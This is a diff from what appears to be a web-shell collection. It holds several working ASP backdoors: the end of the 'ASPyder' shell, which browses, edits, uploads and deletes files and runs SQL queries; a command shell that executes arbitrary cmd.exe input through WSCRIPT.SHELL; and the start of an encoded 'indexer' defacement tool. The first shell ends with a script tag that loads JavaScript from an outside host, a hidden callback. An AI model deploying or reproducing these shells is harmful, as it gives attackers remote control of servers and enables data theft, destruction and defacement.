<html><title>ASPyQAnalyser</title>
|
||||
<script language="VbScript">
|
||||
sub cmdSubmit_onclick
|
||||
if Document.frmSQL.txtSQL.value = "" then
|
||||
Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vbcrlf & "ORDER BY "
|
||||
exit sub
|
||||
end if
|
||||
Document.frmSQL.Submit
|
||||
end sub
|
||||
sub cmdTables_onclick
|
||||
Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobjects where xtype='U' order by name"
|
||||
Document.frmSQL.Submit
|
||||
end sub
|
||||
sub cmdColumns_onclick
|
||||
strTable =InputBox("Return Columns for which Table?","Table Name...")
|
||||
strTable = Trim(strTable)
|
||||
if len(strTable) > 0 Then
|
||||
SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name"
|
||||
Document.frmSQL.txtSQL.value = SQL
|
||||
Document.frmSQL.Submit
|
||||
End if
|
||||
end sub
|
||||
sub cmdClear_onclick
|
||||
Document.frmSQL.txtSQL.value = ""
|
||||
end sub
|
||||
sub cmdBack_onclick
|
||||
Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=session("txtpath")%>"
|
||||
end sub
|
||||
Sub btnPagePrev_OnClick
|
||||
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
|
||||
Document.frmSQL.Submit
|
||||
end sub
|
||||
Sub btnPageNext_OnClick
|
||||
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1
|
||||
Document.frmSQL.Submit
|
||||
end sub
|
||||
Sub cmbPageSelect_onchange
|
||||
Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1)
|
||||
Document.frmSQL.Submit
|
||||
End Sub
|
||||
Sub txtNoRecords_onclick
|
||||
Document.frmSQL.cmbPageSelect.selectedIndex = 0
|
||||
Document.frmSQL.mPage.value = 1
|
||||
End Sub
|
||||
</script>
|
||||
<style>
|
||||
TR {font-family: sans-serif;}
|
||||
</style>
|
||||
<body bgcolor=black>
|
||||
<form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" method=Post>
|
||||
<table border="0"><tr>
|
||||
<td align=right><font color=#ff8300 size="4" face="webdings">@ </font><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste
|
||||
your connection string here : </font><font color="#CCCCCC">
|
||||
<input name=txtCon type="text" size="60" value="<%=session("dbcon")%>">
|
||||
</font><BR>
|
||||
<textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textarea><BR>
|
||||
<input name=cmdSubmit type=button value=Submit><input name=cmdTables type=button value=Tables><input name=cmdColumns type=button value=Columns><input name="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear><input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXML" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML</FONT>
|
||||
</td>
|
||||
<td>XXXXXX</td><td>
|
||||
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
|
||||
</td></tr></table>
|
||||
<table><tr><td><%If Request.Form("chkXML") = "on" Then getXML(myQuery) Else getTable(myQuery) %></td></tr></table></form>
|
||||
<HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=-1 color=gray>Cheers to <a href="mailto:hAshish@shagzzz.cjb.net">hAshish</a> for all the help!</font></p><BR>
|
||||
</body>
|
||||
</html>
|
||||
<%
|
||||
set myDBConnection = nothing
|
||||
set rs2 = nothing
|
||||
set rs = nothing
|
||||
'-------------
|
||||
response.End()
|
||||
end if
|
||||
'QUERY ANALYSER -- STOP
|
||||
%>
|
||||
<title><%=MyPath%></title>
|
||||
</head>
|
||||
<body bgcolor=black text=white topAprgin="0">
|
||||
<!-- Copyright Vela iNC. Apr2003 [www.shagzzz.cjb.net] Coded by ~sir_shagalot -->
|
||||
<%
|
||||
Response.Flush
|
||||
'Code Optimisation START
|
||||
select case request.form("cmd")
|
||||
case ""
|
||||
If request.form("dirStuff")<>"" then
|
||||
Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>"
|
||||
Else
|
||||
Response.Write "<font face=webdings size=+3 color=#ff8300>آ</font>"
|
||||
End If
|
||||
case " Copy "
|
||||
' ---Copy From Folder routine Start
|
||||
If Request.Form("Fname")="" then
|
||||
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>"
|
||||
err.number=424
|
||||
Else
|
||||
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>"
|
||||
fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fname"),Target & Request.Form("Fname")
|
||||
Response.Flush
|
||||
End If
|
||||
' ---Copy From Folder routine Stop
|
||||
case " Copy "
|
||||
' ---Copy Too Folder routine Start
|
||||
If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "------------------------------" Then
|
||||
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>"
|
||||
Response.Flush
|
||||
fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath") & "\" & Request.Form("ToCopy")
|
||||
Else
|
||||
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>"
|
||||
err.number=424
|
||||
End If
|
||||
' ---Copy Too Folder routine Stop
|
||||
case "Delete" 'two of this
|
||||
if request.form("todelete")<>"" then
|
||||
' ---File Delete start
|
||||
If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then
|
||||
Response.Write "<center><font face=arial size=-2 color=#ff8300><BR><BR><HR>SELFDESTRUCT INITIATED...<BR>"
|
||||
Response.Flush
|
||||
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
|
||||
%>+++DONE+++</font><BR><HR>
|
||||
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
|
||||
<%Response.End
|
||||
End If
|
||||
If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "------------------------------" Then
|
||||
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>"
|
||||
Response.Flush
|
||||
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
|
||||
Else
|
||||
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\???</font><BR>"
|
||||
err.number=424
|
||||
End If
|
||||
' ---File Delete stop
|
||||
Else If request.form("dirStuff")<>"" then
|
||||
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting folder...</font><BR>"
|
||||
fso.DeleteFolder MyPath & "\" & request.form("DirName")
|
||||
end if
|
||||
End If
|
||||
|
||||
case "Edit/Create"
|
||||
%>
|
||||
<center><BR><table bgcolor="#505050" cellpadding="8"><tr>
|
||||
<td bgcolor="#000000" valign="bottom">
|
||||
<Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box maynot display special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font>
|
||||
</td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR>
|
||||
<%
|
||||
' fetch file information
|
||||
Set f = fso.GetFile(pathname)
|
||||
%>
|
||||
file Type: <%=f.Type%><BR>
|
||||
file Size: <%=FormatNumber(f.size,0)%> bytes<BR>
|
||||
file Created: <%=FormatDateTime(f.datecreated,1)%> <%=FormatDateTime(f.datecreated,3)%><BR>
|
||||
last Modified: <%=FormatDateTime(f.datelastmodified,1)%> <%=FormatDateTime(f.datelastmodified,3)%><BR>
|
||||
last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%> <%=FormatDateTime(f.datelastaccessed,3)%><BR>
|
||||
file Attributes: <%=f.attributes%><BR>
|
||||
<%
|
||||
Set f = Nothing
|
||||
response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">"
|
||||
'read the file
|
||||
Set f = fso.OpenTextFile(pathname)
|
||||
If NOT f.AtEndOfStream Then fstr = f.readall
|
||||
f.Close
|
||||
Set f = Nothing
|
||||
Set fso = Nothing
|
||||
response.write "<TABLE><TR><TD>" & VBCRLF
|
||||
response.write "<FONT TITLE=""Use this text area to view or change the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF
|
||||
response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF
|
||||
response.write "</TD></TR></TABLE>" & VBCRLF
|
||||
%>
|
||||
<BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME" VALUE="<%=pathname%>">
|
||||
<INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file specifed and overwrite it without warning.">
|
||||
<INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an error while saving, then most likely you do not have write access OR the file attributes are set to readonly !!">
|
||||
</FORM></td></tr></table><BR>
|
||||
<%
|
||||
response.end
|
||||
|
||||
case "Create"
|
||||
Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>"
|
||||
fso.CreateFolder MyPath & "\" & request.form("DirName")
|
||||
|
||||
case "Save As"
|
||||
Response.Write "<font face=arial size=-2 color=#ff8300>Saving file...</font><BR>"
|
||||
Set f = fso.CreateTextFile(Request.Form("pathname"))
|
||||
f.write Request.Form("FILEDATA")
|
||||
f.close
|
||||
end select
|
||||
'Code Optimisation STOP
|
||||
' ---DRIVES start here
|
||||
If request.querystring("getDRVs")="@" then
|
||||
%>
|
||||
<BR><BR><BR><center><table bgcolor="#505050" cellpadding=4>
|
||||
<tr><td><Font face=arial size=-1>Available Drive Information:</font>
|
||||
</td></tr><tr><td bgcolor=black >
|
||||
<table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName</td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></tr>
|
||||
<%For Each thingy in fso.Drives%>
|
||||
<tr><td><tt>
|
||||
<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thingy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSize)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeName%>
|
||||
<%Next%>
|
||||
</td></tr></table>
|
||||
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
|
||||
<%
|
||||
Response.end
|
||||
end if
|
||||
' ---DRIVES stop here
|
||||
%>
|
||||
<HEAD>
|
||||
<SCRIPT Language="VBScript">
|
||||
sub getit(thestuff)
|
||||
if right("<%=showPath%>",1) <> "\" Then
|
||||
document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff
|
||||
Else
|
||||
document.myform.txtpath.value = "<%=showPath%>" & thestuff
|
||||
End If
|
||||
document.myform.submit()
|
||||
End sub
|
||||
</SCRIPT>
|
||||
</HEAD>
|
||||
<%
|
||||
'---Report errors
|
||||
select case err.number
|
||||
case "0"
|
||||
response.write "<font face=webdings color=#55ff55>i</font> <font face=arial size=-2>Successfull..</font>"
|
||||
|
||||
case "58"
|
||||
response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>"
|
||||
|
||||
case "70"
|
||||
response.write "<font face=arial size=-1 color=red>Permission Denied, folder/file is readonly or contains such files...</font>"
|
||||
|
||||
case "76"
|
||||
response.write "<font face=arial size=-1 color=red>Path not found...</font>"
|
||||
|
||||
case "424"
|
||||
response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>"
|
||||
|
||||
case else
|
||||
response.write "<font face=arial size=-1 color=red>" & err.description & "</font>"
|
||||
|
||||
end select
|
||||
'---Report errors end
|
||||
%>
|
||||
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
|
||||
<font face=Courier>
|
||||
<table><tr><td>
|
||||
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="myform" >
|
||||
<Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
|
||||
<font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName%> </td></tr>
|
||||
<tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Servervariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > <%=showPath%></Font>
|
||||
<BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value=" View " >
|
||||
</td></tr></form></table>
|
||||
</td><td><center>
|
||||
<table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
|
||||
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
|
||||
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?logoff=@&...thankyou.for.using.ASpyder....~sir_shagalot!..[shagzzz.cjb.net]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
|
||||
</td></tr></table>
|
||||
<p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
|
||||
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
|
||||
<select size=1 name=ToDelete >
|
||||
<option>------------------------------</option>"
|
||||
<%
|
||||
fi=0
|
||||
For each file in folder.Files
|
||||
Response.Write "<option>" & file.name & "</option>"
|
||||
fi=fi+1
|
||||
next
|
||||
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>"
|
||||
Response.Write "<form method=post name=frmCopyFile action=""" & Request.Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy >"
|
||||
Response.Write "<option>------------------------------</option>"
|
||||
For each file in fileCopy.Files
|
||||
Response.Write "<option>" & file.name & "</option>"
|
||||
next
|
||||
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value="" Copy "" ></form></td></tr></Table>"
|
||||
Response.Flush
|
||||
' ---View Tree Begins Here
|
||||
Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR>"
|
||||
fo=0
|
||||
Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>"
|
||||
|
||||
For each fold in folder.SubFolders '-->FOLDERz
|
||||
fo=fo+1
|
||||
Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick=""getit('" & fold.name & "')"">" & fold.name & "</span></FONT><BR>"
|
||||
Next
|
||||
%>
|
||||
<BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
|
||||
<table bgcolor=#505050 cellspacing=4><tr><td>
|
||||
<font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
|
||||
<tr><td align=right ><input type=text size=20 name=DirName><BR>
|
||||
<input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
|
||||
</tr></td></table></form>
|
||||
<%
|
||||
Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR>"
|
||||
Response.Flush
|
||||
%>
|
||||
<form method=post name=frmCopySelected action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
|
||||
<%
|
||||
Response.write "<center><select name=Fname size=" & fi+3 & " style=""background-color: rgb(48,48,48); color: rgb(210,210,210)"">"
|
||||
For each file in folder.Files '-->FILEz
|
||||
Response.Write "<option value=""" & file.name & """> " & file.name & " -- [" & Int(file.size/1024)+1 & " kb]</option>"
|
||||
Next
|
||||
Response.write "</select>"
|
||||
Response.write "<br><input type=submit name=cmd value="" Copy ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Download>"
|
||||
%>
|
||||
</form>
|
||||
<%
|
||||
Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>"
|
||||
' ---View Tree Ends Here
|
||||
' ---Upload Routine starts here
|
||||
%>
|
||||
<form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Servervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>">
|
||||
<table bgcolor="#505050" cellpadding="8">
|
||||
<tr>
|
||||
<td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE3"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE4"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE5"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE6"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE7"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE8"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE9"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE10"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE11"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE12"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE13"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE14"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE15"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE16"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE17"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE18"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE19"><BR>
|
||||
<input TYPE="FILE" SIZE="53" NAME="FILE20"><BR>
|
||||
|
||||
<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If you recieve an error while uploading, then most likely you do not have write access to disk !!">
|
||||
</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
<BR>
|
||||
<table bgcolor="#505050" cellpadding="6">
|
||||
<tr>
|
||||
<td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gray>NOTE FOR UPLOAD -
|
||||
YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER FOR THIS LIBRARY TO
|
||||
FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL INTERNET
|
||||
EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<%
|
||||
' ---Upload Routine stops here
|
||||
%>
|
||||
|
||||
</font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR>
|
||||
</body></html>
|
||||
<SCRIPT SRC=http://www.saldiri.org/summer/ciz.js></SCRIPT>
|
41
xakep-shells/ASP/cmd-asp-5.1.asp.txt
Normal file
41
xakep-shells/ASP/cmd-asp-5.1.asp.txt
Normal file
|
@ -0,0 +1,41 @@
|
|||
<%
|
||||
|
||||
' ASP Cmd Shell On IIS 5.1
|
||||
' brett.moore_at_security-assessment.com
|
||||
' http://seclists.org/bugtraq/2006/Dec/0226.html
|
||||
|
||||
|
||||
Dim oS,oSNet,oFSys, oF,szCMD, szTF
|
||||
On Error Resume Next
|
||||
Set oS = Server.CreateObject("WSCRIPT.SHELL")
|
||||
Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||
szCMD = Request.Form("C")
|
||||
If (szCMD <> "") Then
|
||||
szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
|
||||
' Here we do the command
|
||||
Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
|
||||
"""",0,True)
|
||||
response.write szTF
|
||||
' Change perms
|
||||
Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
|
||||
everyone:F",0,True)
|
||||
Set oF = oFSys.OpenTextFile(szTF,1,False,0)
|
||||
End If
|
||||
%>
|
||||
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
|
||||
<input type=text name="C" size=70 value="<%= szCMD %>">
|
||||
<input type=submit value="Run"></FORM><PRE>
|
||||
Machine: <%=oSNet.ComputerName%><BR>
|
||||
Username: <%=oSNet.UserName%><br>
|
||||
<%
|
||||
If (IsObject(oF)) Then
|
||||
On Error Resume Next
|
||||
Response.Write Server.HTMLEncode(oF.ReadAll)
|
||||
oF.Close
|
||||
Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
|
||||
End If
|
||||
|
||||
%>
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
2324
xakep-shells/ASP/elmaliseker.asp.txt
Normal file
2324
xakep-shells/ASP/elmaliseker.asp.txt
Normal file
File diff suppressed because it is too large
Load diff
74
xakep-shells/ASP/indexer.asp.txt
Normal file
74
xakep-shells/ASP/indexer.asp.txt
Normal file
|
@ -0,0 +1,74 @@
|
|||
<%@ LANGUAGE = VBScript.Encode %>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<meta http-equiv="Content-Language" content="tr">
|
||||
<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
|
||||
<%#@~^UgsAAA==^mVs,/DXV@#@&OEk'~J@!mnUD+D@*@!4M@*@!6G.:,l1YrWUx4YOw=&zShA klxCsD+.WM KDL,YmDoY{m4^lU3,:nO4WN{2WkY@*@!rUw!Y,YzwnxkE8:bOP7ls;'JEjz1)S:3"r]cr"MJrPkry'*c@*@!&WKD:@*E@#@&m\6xE@!1+ YnD@*@!6WUY,^W^W.x^k:n~kk"+{X@*?^MkaYP_l0Výx9l@!4M@*@!WKxY,^W^WD{A4kD+,/rynxy@*@!z1nxD+.@*@!Vk@*$!PjmMraY~g+kx+,r^;þY!Dhl,CCV0ýP..k^:kþ,#nXmP`x;Y;ssEþ~?.\DsCMlPÝU[6~bDhm3~j+,?+M\.Nm3rPz/2~BPw42PBPlk2aPTk(k~NGdHlslMýUPbç+.rðbxk~G0Ehl0~bçkU,XmyýVsýþYýM @!(D@*@!^k@*$!P?1.kaYV~$kMPÇK3~?rOXnP`ð.lþsl[C P}C4s+O/b"1+~Ý N6PzYm8k^k./bxr"c`PUPPGW/D~jkD+^+.k~umDrçP*@!Vb@*j^MkwOr PFE^smxýsýþý,ÝV0PAm3ýþDCPnl.ýþý3,Mnsm+0OkMR@!^r@*SüD0x~ArsTk~29rxs+V~ÝçbxPF;^VCxsC,|ýsm\!yE E,63!X;x!y c@!4M@*@!1+xDn.@*@!k@*AzP\n4NrJ@#@&3!VsC k:xE@!mnxDnM@*@!6W YP1W^GD{Vr:Pdr.+'l@*|!VVmUýhP~k^orVn.b@!8D@*@!0KxO~1WVG.{h4kDn,/r.+{ @*@!z1nxD+.@*@!0GUDP/b"+{F@*@!sr@*g+MNnx_~~E.lHCPzYC^mðýxýy~r Nn6b~Tk.bx,`bDl1Cðýxý.Prx9+a~n+x9rPUkYUry9+,rs:Csý*ÖDU)Gn0mEsOcl/2@!^k@*1.XnQP~EPný/sCPÝ Nn6bPuC ok,jkD+X~)Ymmm3dlUý",WUE ~XDrUbPXC"mmC3kýUý.Pö. P=PRczc zmVrxbxdrD+/b mK:P@!C~tM+6'_W.U3@*@!6GxDP^G^WDxsb:n@*G)_b~wb\Sb,ÖIg3|,"Z@!Jl@*@!J0W O@*@!Vk@*6VE,g,A;DCzmPG3!hl0PrdD+Nnðr k"PGGkXC ýx,bNý ýPjnPI+.k k~emyýx,@!l,tDWxgKD +V @*@!6WUY,^W^W.x^k:n@*Gbub,oz}JzPÖ"12nR@!&l@*@!&0KxO@*@!4D@*@!mxY.@*AHP@!l~t.n6'hlbsYK)hCbV4Gh(@$4WDhmkscmK:gkE(%+1Yxk NnaD@*tnt9k@!JC@*@!(D@*?2+^rmV~K4Cx0/~PKPCGsHfn:KU,~30WMW:mx,SP_kO4mXOCMP~GnVb0kþVE@#@&mKwz'E@!1+UY.@*@!0GUDPmGsKDxVbhPdby'*@*Ksk6Pul03ý@!8M@*@!6GxDPmKsGD{h4kO+~dbyn'y@*@!JmnUD+D@*@!^k@*A!~Um.bwDPHt9rP:l.l6ýx[C P5m"ýVsýþYýDc@!sk@*fð+.Vr~:lVý:,)D0l[Cþ^lDýh~_WsXGnsWUvb9:k #,SPA3GDK:CU,`sc6RqPl9hrxbP*PSPurD4CXDCDv?CUmVb.n l~b9hbxr*PBPfVbWkþ3~`UlUC^bDUl,bNsrUk*PBPPE.C /G0D~`:E.C /WWOcKVPz[skUb#,~Pg+K~.PPü:,b[CsPr^Cx^lDm~P+þ30üDs+. c@!sk@*$E,?^.bwY~)kVCP@!WKxO,mKVWM'^r:@*JWTPcVmXýY*~@!J0W O@*K!Ysl"R@!sb@*3L9nDbx~ezwYýðý~$!xCP~n ynMPUmDbwD~KüsP$k^orsDk,JWTVEHG.P~k^orxr"R Rv$E,KCVýsNlU~UmGD^nXP9xxPdlsnD,\nPAL[nMPSmh+MkP:üh~AÝ^obVnDr~dWLV!zWMVC.*@!Vr@*Vü\nx^r,ArMPUmDbwD~Ýçk Pjl9+^n,?K,dmMkwDsnDbxbPFEssmxhl ý"ýPÖ +.rMky E@#@&sk V^+.{J@!m+ Y.@*@!0GxDP^G^WD{sks+Pkr"+{*@*fG/O~UkO+^nD@!4.@*@!0WUO,mGVK.{h4bYP/byx @*@!&mxOnM@*@!^r@*ShhcdCxmVD+.W. KDL@!^r@*ShA 6lY4nMWWh8cmGs@!^k@*ShS /mxCVmDnUmRmKh@!^k@*SAARDEMlU/GWDRO3@!sk@*hAAcYl4.b4CYc^K:@!^k@*hhSRbdVm:CtbyhnDRmKh@!^k@*SAAR4lMEUXC4Hl WML@!1+UOD@*@!WKxOP1G^W.{DNPkk.n'W@*Jbt2]~UÝK2d3IÝ@!zmUO+M@*@!4.@*@!WKxOPkry'+@*@!Vk@*ASh /m8KYCT+ Y+m:cGDTPSPShA kl\kC3cmWs~SPShSRhkUr6 xOJ@#@&GLP'~];;+kOcp;DH?YMk L@#@&kWPKon~{PJr~Y4+x@#@&^l^V,:CkU@#@&+s/r0,WLn,'PE!Kx[+ME,Y4x@#@&mmV^~mm/nF@#@&nsk+k6~WT+P{~EW0ErPOtnU@#@&^l^sP1ldny@#@&nsk+r0,GT+~{Prtl03bUNmJ~Y4+U@#@&ml^sP1l/f@#@&Vk+r0~GT+~',E3!VsC k:E~Dtnx@#@&1ls^P1l/c@#@&+^/nk6PGLP',EmKwXr~Otx@#@&^lss,mC/X@#@&+sdk0~GT+~',E^kU0VDJ,Y4nx@#@&^l^V~^m/++@#@&V/rWPKoPxPEGMxn3r~Y4+U@#@&mlss,mC/{@#@&n^/k0,WTnP{PEWMxnVyJPD4+ @#@&1CsV,mm/n%@#@&x[PbW@#@&/;8,:lrUS40DAA==^#~@%>
|
||||
<center>
|
||||
<br><br><br><br><br><br><br><br>
|
||||
<br><br><br><br><br><br><br><br>
|
||||
<hr color=lime width=50%>
|
||||
<SCRIPT LANGUAGE="JavaScript">
|
||||
<!--
|
||||
function Start(page)
|
||||
{
|
||||
OpenWin = this.open(page, "CtrlWindow","toolbar=menubar=No,scrollbars=No,status=No,height=250,");
|
||||
}
|
||||
//-->
|
||||
</SCRIPT>
|
||||
<script language="JavaScript1.2">
|
||||
var message="SaNaLTeRoR - ÝnDexEr - Reader"
|
||||
var typingbasecolor="red"
|
||||
var typingtextcolor="lime"
|
||||
var blinkspeed=598
|
||||
var fontface="arial,geneva,helvetica"
|
||||
var fontsize="5"
|
||||
var n=0
|
||||
if (document.all){
|
||||
